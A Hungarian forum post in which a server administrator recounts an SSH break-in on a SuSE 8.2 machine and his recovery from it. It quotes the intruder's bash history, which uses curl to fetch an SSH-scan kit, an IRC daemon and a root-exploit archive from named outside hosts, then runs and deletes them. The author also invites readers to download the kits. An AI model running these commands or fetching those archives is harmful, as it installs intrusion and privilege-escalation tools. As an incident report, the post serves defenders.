Sokat gondolkodtam, azon, hogy közre adjam-e a dolgot, vagy sem.
Aztán úgy döntöttaqm, aki gazfickó, az úgyis tudja, aki meg nem
az és nem tudja, hát tudja meg miként lehet betörni egy tűzfallal
védett rendszerbe (1 éve szeretnék váltani itt, de nem engedik):
Környezet: Közepes vas, széles sávú adsl, online kapcsolat SuSE 8.2,
SuSEFirewall2 tűzfal. SSH, POP3, HTTP - szóval semmi extra.
Az eset a múlt héten történt, vasárnap csíptük fülön az illetőt.
Romániából érkezett: 81.196.10.201 és még vagy 2-3 ennek közelében
lévő címről.
Szólnak a szólgáltatótól, hogy valaki ssh-ziuk kifelé ezerrel. Bemegyek,
ps ax - azt látom valami ./ssh-scan 100 fut sok-sok példányban.
Gőzöm nem volt, hogy hogy került ide ez a program. Restart...
Csináltam egy kis scriptet, ami netstat -T -val 10 percenként
kiloggolja a TCP/IP rendszer állapotát. Szombat éjjel leállt a gép,
- a központi ping-ellenörző script jelzi is ezt - illetve kívülről nem
lehetett föllépni rá. Hétfő reggel: restart... És lőn meglepetés:
rootként nem lehet belépni, valaki megváltoztatta a jelszót.
(A jelszó kitalálásának valószínűsége: nulla). Repare: boot cdről,
mount, majd chroot - jelszócsere - reboot.
Nézzük a logokat:
- a netstatoló script a leállás előtt közvetlenül nagyszámú kapcsolatot jelez.
- a /var/log/messages-ben ott feltételezett sor: Accepted password from root
Vajon mit csinálhatott a betörő, miután bejött és hogyan jött be?
A bejövetel egy proba nevű useren keresztül történt, legalábbis
ezt sejtjük (a jelszócserét megelőzte a proba-ként való belépés!)
Hogy mit csinált őkelme? Íme (a nyomokat nem tüntette le maga
után, hiba volt részéről)
id
wget
curl-O http://crawdaddy.home.ro/TurboB.tgz
curl -O http://crawdaddy.home.ro/TurboB.tgz
tar xzvf TurboB.tgz
cd ssh
mail
curl-O http://ircd.bircd.org/bewareircd-linux.tar.gz
curl -O http://ircd.bircd.org/bewareircd-linux.tar.gz
tar zxvf bewareircd-linux.tar.gz
cd bircd
./bircd
ls
pico ircd.conf
vi ircd.conf
./rehash
./restart
vi ircd.conf
./restart
./rehash
kill -9 9257
cd bircd
ls
./stop
cd bircd
ls
./rehash
./bircd
vi ircd.conf
ls
vi bircd.ini
./rehash
./restart
cd bircd
./bircd
vi bircd.ini
./rehash
./restart
./bircd
ls
vi bircd.ini
vi bircd.txt
vi bircd-qnet.ini
./rehash
vi stdout.txt
./rehash
./restart
./bircd
ls
vi ircd.conf
./rehash
./restart
./bircd
cd ..
rm -rf *
ls
cd ssh2
cd ssh
curl -0 http://venerix.100free.com/root.tar.gz
curl-O http://venerix.100free.com/root.tar.gz
curl -O http://venerix.100free.com/root.tar.gz
tar zxvf root.tar.gz
cd root
./memo
id
./x
id
cd ..
rm -rf *
ls
Ezek a bash_history bejegyzései. Tehát bejött, letöltötte a számára
szükséges dolgokat, ebből felépített egy saját kis rendszert és
elkezdett innen kifelé kommunikálni, újabb áldozatokat keresni.
Csak ugródeszkának kellettünk neki, egyéb kárt nem okozott
(leszámítva a jelszócserét.)
Most nem elemzem ki a letöltött dolgokat, töltsétek le Ti is,
nézzétek meg mit csinált. Ebben rejlik a védekezés módja is.
Várom azoknak a hozzászólását, akiket hasonlóan törtek föl, illetve
akik nálam jobban tudják értelmezni a jelenséget.